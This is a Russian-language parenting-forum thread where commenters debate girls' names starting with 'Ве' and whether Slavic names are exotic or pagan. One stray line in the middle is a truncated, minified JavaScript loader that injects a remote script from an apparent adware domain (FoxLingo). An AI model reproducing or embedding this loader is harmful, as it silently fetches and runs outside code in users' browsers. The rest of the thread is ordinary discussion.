Ве.... имена девочек
Не забывайте, что ребенку, когда он вырастет - с этим именем жить...извините, но очень экзотично...Ветрана - вообще какая-то ветерана...
Я абсолютно ничего не имею против славянских имен, просто думаю, что нужно принимать во внимание суровые реалии нынешнего века, славянские имена были не экзотикой - очень-очень давно. Никак не хочу вас обидеть, вы верите в языческих богов и живете согласно славянским древним традициям?
А Вы верите в Деметру, поэтому имя Дмитрий (посвящённый Деметре) считаете нормальным, не экзотическим?
В славянских странах прекрасно живут со славянскими именами, будучи при этом христианами. Болгария, Сербия, Польша. И только в России пользование родным языком предлагают считать язычеством.
А при чем тут Деметра, при чем тут Дмитрий...Я вас спросила про языческую веру, а не конкретно про какого-либо бога...раз уж вы говорите, что "дожили, что славянские имена - экзотика", то соответственно, делаю вывод, что для вас эти имена нормальны в 2013м году....и может вы являетесь почитателем Ярило, Перуна, Велеса и т.д., ходите на капища и прочее.. Про греческие имена, конечно я в курсе, а про свое имя и подавно. В любом случае, смысл пререкаться - каждый останется при своем. Мой взгляд на все подобные имена - такой: в классе Саши, Маши, Пети, Наташи, Коли, Сережи, и среди них какой-нибудь Святогор....А дети ооочень жестокие, угадайте, кого из класса будут дразнить больше всех...
безусловно Сашку, Наташку и Машку, даже гадать не надо, т.к. дразнилка известна. А вот на Святогора надо ещё придумать.
Мой ребёнок с "экзотическим" славянским именем спокойно живёт в детских коллективах и никто его не дразнит.
Я не хожу на капища и прочее, но для того, чтобы быть в курсе славянских имён, это не требуется, достаточно иногда жить в других славянских странах, кроме России, где эти имена остались в ходу.
Вы из какой-либо вышеперечисленной страны? Да, я знаю, что в Сербии всякие имена подобно Цветко, Ангел и прочее...Но ложка хороша к обеду....Если эти имена у 90% вашего окружения - то это не экзотика, а если эти имена у 10% - то это все равно режет ухо. Вы готовы поспорить, что славяне были не язычниками?
Славяне, также как и другие народы, сначала были язычниками, потом стали христианами, это их не отличает от греков, итальянцев, англичан, французов и иже с ними. При этом почти все из них пользуются именами, возникшими в языческие времена и лишь небольшое количество имён в использовании древнееврейского происхождения.
Я сейчас живу в России.
Ни в одной славянской стране нет 90% населения со славянскими именами. В Сербии, где самый большой % славянских имён, славянского происхождения только 45% имён. И при этом славянские имена не экзотика. Также как в России совсем не экзотика 9 славянских имён, которые вошли в Святцы, например Владимир.
А пройти мимо не получилось? Вроде просили проголосовать, не нравится, не голосуйте и всё
увы, вы не предусмотрели в голосовании вариант "никакое не нравится", а ведь не только я такого мнения)
Скорее, почитать. Интересные имена.
О, это мой любимый сайт, часто там все изучаю) По именам, наверное, самый наполненный.
Есть в святцах Виренея. А эти что-то через чур. Ветрана - вообще..., подумайте какие ассоциации.
Для коллекции ВЕнеры не хватает))))))))))))
мне не нравится это имя. Да и у мужа в семье и Вера, и Вероника
У знакомых дочку зовут Вета,интересно-это из этой же серии?
может как вариант рассмотрите Веринея?
Какието все чудные-Весняна вообще-жесть.
[removed]!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s. || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();[removed]
Слово «верея» в общерусском значении В.И.Даль определяет как «...столб, на который навешиваются полотенца ворот».
Все по своему хороши. Больше нравятся Веяна, Весняна, Ведана и Весна ) Очень нежно звучат.
По звучанию из этих имен больше всего ВерЕя нравится, с ударением на Е.
Только не Верея - это город в Подмосковье, жуткая дыра!!!
